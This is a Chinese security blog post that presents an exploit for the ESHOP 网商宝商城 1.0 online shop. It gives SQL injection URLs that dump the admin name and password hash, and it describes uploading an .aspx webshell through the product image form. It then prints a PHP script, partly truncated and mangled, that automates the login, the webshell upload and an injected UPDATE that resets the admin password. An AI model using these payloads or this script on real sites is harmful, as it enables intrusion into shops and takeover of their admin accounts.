ESHOP 网商宝商城 1.0 GetWebshell Exploit

  • A+
所属分类:lcx

某天起床比较晚,起来发现地上有传单。

看了下是个网店。

于是想看看用的什么程序,找了下(看html注释,css注释,文件名)。发现是ESHOP网商宝商城。

google下漏洞,发现有eshop的漏洞,测试了下,不对啊。不过还是报错了。结果发现有其他的网店系统叫ESHOP。

放了两天,然后想起了再来测试下注入,它有过滤代码的。下了源码看了下。结果没有过滤select关键字。

在前台搜索处,价格从  到  哪里发现一处数字型注入点。

结合代码里找到的管理员表名和列名。然后就可以爆了。

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0

// 第一个管理员的登录名

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0

//密码。标准md5的,大家懂的。

放注入的地方还没有过滤update。所以密码反查不出来,可以更新哦。还有一点,这个过滤代码只过滤了get方式的。

进入后台后。产品系统-》产品内容-》列表图片哪里可以直接传aspx文件。关于路径,直接传aspx不能显示路径,所以先直接传jpg的把路径搞到手,再传aspx的就KO了。

打完收工。

PS:监测而已,不搞破坏的。

/", $recvdata, $tempdata) == 0)
	{
		echo "rnlogin error";
		exit();
	}
	preg_match("//.*"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION" va.*" />/", $recvdata, $tempdata);
	preg_match("//.*"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

	$tempdate = "";
	preg_match("/ASP.NET_SessionId.*;/", $recvdata, $tempdata);
	$cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=admin&txtPassword=123456&button=%C2%A0%C2%A0rn";
	$content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=".$adminname."&txtPassword=123456&button=%C2%A0dfg%C2%A0rnrn";
	$url = "POST ".$path."/back-login.aspx HTTP/1.1";
	$recvdata = SendData($host, $port, $url, $content, $cookie, $type);

	$tempdata = "";
	if (preg_match("/Cookie:.*;/", $recvdata, $tempdata) == 0)
	{
		echo "rnlogin error";
		exit();
	}
	 
	$cookie = $tempdata[0]." ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
	$recvdata = SendData($host, $port, "GET ".$path."/manager/product_detail.aspx HTTP/1.1", "", $cookie, $type);
	$tempdata = "";
	$VIEWSTATE = "";
	$EVENTVALIDATION = "";
	if (preg_match("/__VIEWSTATE" va.*" />/", $recvdata, $tempdata) == 0)
	{
		echo "rnNo /manager";
		exit();
	}
	preg_match("//.*"/", $tempdata[0],  $VIEWSTATE);
	$VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
	$tempdata = "";
	preg_match("/__EVENTVALIDATION" va.*" />/", $recvdata, $tempdata);
	preg_match("//.*"/", $tempdata[0],  $EVENTVALIDATION);
	$EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);
		
	$content = '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTTARGET"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTARGUMENT"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__LASTFOCUS"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__VIEWSTATE"

';
	$content .= $VIEWSTATE[0]."rn";///wEPDwUJODI1MTc5NTgyD2QWAmYPZBYMAgMPFgIeBFRleHQFEDIwMTItMDQtMjIgMTE6NTFkAgUPFgIfAAUP6LaF57qn566h55CG5ZGYZAIHDxYCHwAFDuaCqOWlve+8mmFkbWluZAIJDxYCHgtfIUl0ZW1Db3VudAIFFgpmD2QWAmYPFQMHcHJvZHVjdAdwcm9kdWN0DOS6p+WTgeezu+e7n2QCAQ9kFgJmDxUDB2FydGljbGUHYXJ0aWNsZQzmlofnq6Dns7vnu59kAgIPZBYCZg8VAwVvcmRlcgVvcmRlcgzorqLljZXns7vnu59kAgMPZBYCZg8VAwZtZW1iZXIGbWVtYmVyDOS8muWRmOeuoeeQhmQCBA9kFgJmDxUDBnN5c3RlbQZzeXN0ZW0M57O757uf566h55CGZAILDxYCHwECBRYKZg9kFgRmDxUBB3Byb2R1Y3RkAgEPFgIfAQIFFgpmD2QWAmYPFQMQcHJvZHVjdF9jYXRlZ29yeRBwcm9kdWN0X2NhdGVnb3J5DOS6p+WTgeebruW9lWQCAQ9kFgJmDxUDEmNhdGVnb3J5X2F0dHJpYnV0ZRJjYXRlZ29yeV9hdHRyaWJ1dGUM55uu5b2V5bGe5oCnZAICD2QWAmYPFQMPcHJvZHVjdF9jb250ZW50D3Byb2R1Y3RfY29udGVudAzkuqflk4HlhoXlrrlkAgMPZBYCZg8VAw1wcm9kdWN0X2JyYW5kDXByb2R1Y3RfYnJhbmQM5Lqn5ZOB5ZOB54mMZAIED2QWAmYPFQMPcHJvZHVjdF9jb21tZW50D3Byb2R1Y3RfY29tbWVudAzkuqflk4Hor4TorrpkAgEPZBYEZg8VAQdhcnRpY2xlZAIBDxYCHwECCBYQZg9kFgJmDxUDBG5ld3MEbmV3cwzmlrDpl7vliqjmgIFkAgEPZBYCZg8VAwRoZWxwBGhlbHAM5Zyo57q/5biu5YqpZAICD2QWAmYPFQMQd2Vic2l0ZV9zaXRlcG9zdBB3ZWJzaXRlX3NpdGVwb3N0DOe9keermeWFrOWRimQCAw9kFgJmDxUDDnNlY3JldF9wcm90ZWN0DnNlY3JldF9wcm90ZWN0DOmakOengeS/neaKpGQCBA9kFgJmDxUDDWxhd19zdGF0ZW1lbnQNbGF3X3N0YXRlbWVudBLmlL/nrZbms5Xlvovlo7DmmI5kAgUPZBYCZg8VAwdyZWNydWl0B3JlY3J1aXQM5Zyo57q/5oub6IGYZAIGD2QWAmYPFQMSaW50ZWdyYXRlX3B1cmNoYXNlEmludGVncmF0ZV9wdXJjaGFzZQzlm6LotK3kuJPljLpkAgcPZBYCZg8VAwxuZXdzX3JlY3ljbGUMbmV3c19yZWN5Y2xlCeWbnuaUtuermWQCAg9kFgRmDxUBBW9yZGVyZAIBDxYCHwECBRYKZg9kFgJmDxUDBW9yZGVyBW9yZGVyBuiuouWNlWQCAQ9kFgJmDxUDD3Nob3BwaW5nX21ldGhvZA9zaG9wcGluZ19tZXRob2QM6YCB6LSn5pa55byPZAICD2QWAmYPFQMOcGF5bWVudF9tZXRob2QOcGF5bWVudF9tZXRob2QM5LuY5qy+5pa55byPZAIDD2QWAmYPFQMNc2hvcHBpbmdfZGF0ZQ1zaG9wcGluZ19kYXRlDOmAgei0p+aXtumXtGQCBA9kFgJmDxUDDG9yZGVyX3N0YXR1cwxvcmRlcl9zdGF0dXMM6K6i5Y2V54q25oCBZAIDD2QWBGYPFQEGbWVtYmVyZAIBDxYCHwECBBYIZg9kFgJmDxUDC21lbWJlcl9pbmZvC21lbWJlcl9pbmZvDOS8muWRmOeuoeeQhmQCAQ9kFgJmDxUDDG1lbWJlcl9sZXZlbAxtZW1iZXJfbGV2ZWwM5Lya5ZGY57qn5YirZAICD2QWAmYPFQMOb25saW5lX21lc3NhZ2UOb25saW5lX21lc3NhZ2UM5Zyo57q/5Y+N6aaIZAIDD2QWAmYPFQMIZmF2b3JpdGUIZmF2b3JpdGUJ5pS26JeP5aS5ZAIED2QWBGYPFQEGc3lzdGVtZAIBDxYCHwECAhYEZg9kFgJmDxUDCmFkbWluX2xpc3QKYWRtaW5fbGlzdAznrqHnkIbnmbvlvZVkAgEPZBYCZg8VAwRyb2xlBHJvbGUM6KeS6Imy566h55CGZAIND2QWAmYPFgIeB2VuY3R5cGUFE211bHRpcGFydC9mb3JtLWRhdGEWEGYPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwNoZGQCBA8PFgIfA2hkZAIKDxBkEBUGDS0t6K+36YCJ5oupLS0P5b+D55CG5YGl5bq357G7CeWwj+ivtOexuw/ouqvkvZPkv53lgaXnsbsP5oiQ6ZW/5Yqx5b+X57G7D+Wls+aAp+ivu+eJqeexuxUGATABMQEyATMBNAE1FCsDBmdnZ2dnZxYBZmQCCw8QZGQWAWZkAiQPDxYCHwNoZGQCJw8PFgIfA2hkZAIoDw8WAh8DaGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYHBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJGNoa0lzU2hvdwUoY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc1JlY29tbWVudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0NvbW1lbnQFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNIb3QFImN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNOZXcFJ2N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkY2hrSXNEaXNjb3VudAUmY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRjaGtJc0RlZmF1bHRMDeHTq5UFawIyhVsczTwNYNAfyw==
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTVALIDATION"

';
	$content .= $EVENTVALIDATION[0]."rn";///wEWJwKs5v06Atqk0q0LAqiR6t4KAp6y8rMBAqKKxtACAsHKosgDAruSn4INAvvs89EPAoim8JICApjJ2vwOAofJ2vwOAobJ2vwOAoXJ2vwOAoTJ2vwOAoPJ2vwOAsWeztoBAtXx5LQNAvLf/5UFAvbTvuwMAqP8+4wOArWL1rkIArOYgK0OAuT2yp4BAtr2xvsMAqjJ1JIOApmbyKgEAu27qeUIAp7KhdUMAt/A1eoLAorU36cKAqyP95gBAvPv2FMCo5i5SQKW9+GSCQLKz7OlDALtheC3DwK87PLABgKokaLfCgKesorLBNFtpcfh8T+rQvlfSsD5CYiQmB8C
	$content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtProductName"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtOrderBy"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtStock"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSaleNumber"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlSecondCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlThirdCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlBrand"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsShow"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsComment"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsNew"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtPrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSalePrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtIntegral"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImage"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImageId"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuUploadList"; filename="asd.aspx"
Content-Type: application/octet-stream


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$btnUploadList"

......
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailZoomImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtKeywords"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSummary"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtContent"


------------EwwmsGcmNCcEdWawAUBSNx--';
	
	$type = "Content-Type: multipart/form-data; boundary=----------EwwmsGcmNCcEdWawAUBSNx";//"Content-Type: multipart/form-data; boundary=----------FhmN6QFkeZCWDWoYR7K01F";
	$recvdata = SendData($host, $port, "POST ".$path."/manager/product_detail.aspx HTTP/1.1", $content, $cookie, $type);
	$tempdata = "";
	preg_match("/upload-file/images/product.*.aspx/", $recvdata, $tempdata);
	$url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x'.$hexpassword.'%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
	SendData($host, $port, $url, $content, $cookie, $type);
	
	echo "rnwebshell:http://$host/".$tempdata[0]."rn";
	
function SendData($host, $port, $url, $content, $cookie, $type)
{
	$data = $url."rn";
	$data .= "Referer: http://$host/rn";
	$data .= $type."rn";
	$data .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1rn";
	$data .= "User-Agent: Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.10.229 Version/11.62rn";
	$data .= "Host: $hostrn";
	$data .= "Content-Length: ".strlen($content)."rn";
	$data .= "Accept-Encoding: gzip, deflatern";
	$data .= "Connection: Closern";
	$data .= $cookie."rnrn";
	$data .= $content;
	$ock=fsockopen($host,$port);
	if (!$ock) 
	{
		echo "No response from hostn";
	}
	fwrite($ock,$data);
	$recvdata = "";
	while (!feof($ock)) 
	{
		$exp=fgets($ock, 1024);
		$recvdata .= $exp;
	}
	fclose($ock);
	return $recvdata;
}
function SingleDecToHex($dec)
{
    $tmp="";
    $dec=$dec%16;
    if($dec

转自:http://www.90sec.org/thread-2156-1-1.html

文章来源于lcx.cc:ESHOP 网商宝商城 1.0 GetWebshell Exploit

相关推荐: 从丝绸之路到安全运维与风险控制 上集

从丝绸之路到安全运维(Operational Security)与风险控制(Risk Management) 上集 0x00 背景 2013年10月2日,在大家都沉浸在十一长假喜悦中的时候,遥远的美国爆发出了一个震惊Tor社区和比特币社区的消息,运营在Tor上…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: